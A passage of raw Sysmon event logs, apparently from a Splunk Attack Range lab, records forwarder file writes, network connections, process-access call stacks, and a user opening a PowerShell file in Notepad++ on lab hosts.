Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F369EA164F1B20F69FF750535663D9F7,SHA256=7565A8E5B092BEF174C7D4602E4486BE283C2231E7695C8A1DD0D16D9F02456B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809286Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:33.125{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9AB787C9B2F608DD815D05425C94658C,SHA256=36EF8A0EE2997E1B69C361F014A81CBB0F2F04C6E433BA2F74AB554F321638DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052403Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:34.368{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EF2FB03B0833AACE051FE484F7DA7887,SHA256=3CE899DDFC1396722BA4C485F82C7ED0A8B4FECB98D8AD2220D29D08E50C7F2F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809289Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:32.922{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse62.80.172.54-51978-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000809288Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:34.172{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DFC5825F6C2D81D769D181CC93B70F22,SHA256=D81F1F3E005E42019B94A96324F7A2E289E82038A13F478198A4BF807C6F901E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052405Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:35.845{466BC892-02AF-60E8-1300-00000000CF01}9761444C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x100000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\cryptsvc.dll+6124|c:\windows\system32\cryptsvc.dll+5e34|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001052404Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:35.383{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=621B683C0A4B407F6E00A79507C12AE5,SHA256=7124C758021C57D883FB2DB95277760F7D39EF0DFAB80F4216BE7370A369DE1F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809290Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:35.176{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=688ACA23067EB46BF2141142430C5E00,SHA256=3D757B00B15C3709420DB72966615FCD43872438EF3140C61816CE5354387B56,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052406Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:36.413{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7048F2C8062C9042A9BC328C704EF28B,SHA256=896ED10CF960A4557F23657E2DAEC778934A6E6172492651FFF78D65691BC1E2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809292Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:34.367{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57384-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000809291Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:36.176{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6F0F967B25AF6CDA9E72D79E858914C,SHA256=FFF5B783AC016F6124451B992EFA97E98772971DE8E2E3759B94C5FD86904159,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052417Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:37.681{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052416Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:37.681{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052415Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:37.565{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052414Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:37.565{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052413Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:37.565{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052412Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:37.565{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052411Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:37.565{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F6E1-60EB-AC7D-00000000CF01}5524C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052410Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:37.565{466BC892-32D3-60E8-770B-00000000CF01}63567592C:\Windows\Explorer.EXE{466BC892-F6E1-60EB-AC7D-00000000CF01}5524C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Notepad++\NppShell_06.dll+4449|C:\Program Files\Notepad++\NppShell_06.dll+46a6|C:\Windows\System32\SHELL32.dll+80337|C:\Windows\System32\SHELL32.dll+6724e|C:\Windows\System32\SHELL32.dll+16d60c|C:\Windows\System32\SHELL32.dll+19e7e8|C:\Windows\System32\SHELL32.dll+2844a3|C:\Windows\system32\explorerframe.dll+13cf7b|C:\Windows\system32\explorerframe.dll+139d07|C:\Windows\System32\SHELL32.dll+16d8b0|C:\Windows\System32\SHELL32.dll+16ad2e|C:\Windows\System32\SHELL32.dll+737a1|C:\Windows\System32\SHELL32.dll+76686|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53 154100x80000000000000001052409Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:37.554{466BC892-F6E1-60EB-AC7D-00000000CF01}5524C:\Program Files\Notepad++\notepad++.exe8.11Notepad++ : a free (GPL) source code editorNotepad++Don HO don.h@free.frnotepad++.exe"C:\Program Files\Notepad++\notepad++.exe" "C:\Temp\test\sd1.ps1"C:\Windows\system32\ATTACKRANGE\bob{466BC892-32CE-60E8-37BC-780000000000}0x78bc373MediumMD5=3433991765511375D3EC11B4FE290298,SHA256=B30DDA913768A864106485E51682E90286D320023221F5676A42CC9B914A11F8,IMPHASH=B65402F137E08F6E43CEEF2CF25E0CC2{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\explorer.exeC:\Windows\Explorer.EXE 354300x80000000000000001052408Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:29.716{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51161-false10.0.1.12-8000- 23542300x80000000000000001052407Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:37.427{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=51DC376A491EFC6A012F84C4A9CCBC9C,SHA256=31EA84A83B2064EC2A8C9D8B7799DA4DFF6202564C64ABA31C20B3C67F68FCEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809293Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:37.192{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6471F0415AC64107D7F106A155684AB9,SHA256=8C7446C91EE74A8CB18F1040C11CF975B5239A07A9BEDB9F18C69463613E5810,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052421Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:38.612{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=71A37DA4588DAFD716A82299ECA48BBF,SHA256=624DDB888A62646B870F791B60312ADF9E3F56DAD789C888BD70582E23B7B993,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052420Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:38.544{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EBF117E96FC513BB7862DF1080E1B9A1,SHA256=BF1E39E1BF898C51947C219B7FF89FD4726E311D07A53828DBA6258848366725,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052419Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:38.544{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1F176F4646537EA9567C66FFB4D512A1,SHA256=B9081DA03919A5C86ACE36CFEB6ED79E7FBAD9399A800788910383554A3ED560,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052418Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:38.442{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70AD64BB58FE5EB0E6AD54478C9A7E14,SHA256=7FA3246140281E7D4B0FCE588DFC265FE3344839EBCC9B838D076D81BE735664,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809294Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:38.192{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E24F91A591DB931346D39F2F465D32B,SHA256=FADFC69DA46232CDE88345D6A237CB1B6894380EC9B23B9147B9A91A047DF383,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052422Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:39.446{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=294867AA69078EF64F4974EDA03D74D5,SHA256=1C428D9557A485E8EF249E7E8932C5F1980DD635559544435D272B621D148792,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809295Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:39.208{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=82424995199BE8357CB3AE8CC79D11E2,SHA256=85D063EAAEE6A85FB611D5E6E626B5FA5AA6A3062C12D530B8CB973A683F8676,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052432Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:40.866{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052431Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:40.866{466BC892-32D3-60E8-770B-00000000CF01}63563256C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052430Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:40.782{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052429Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:40.782{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052428Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:40.782{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052427Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:40.782{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052426Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:40.782{466BC892-32CD-60E8-670B-00000000CF01}45163808C:\Windows\system32\csrss.exe{466BC892-F6E4-60EB-AD7D-00000000CF01}8884C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052425Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:40.782{466BC892-32D3-60E8-770B-00000000CF01}63567592C:\Windows\Explorer.EXE{466BC892-F6E4-60EB-AD7D-00000000CF01}8884C:\Program Files\Notepad++\notepad++.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Notepad++\NppShell_06.dll+4449|C:\Program 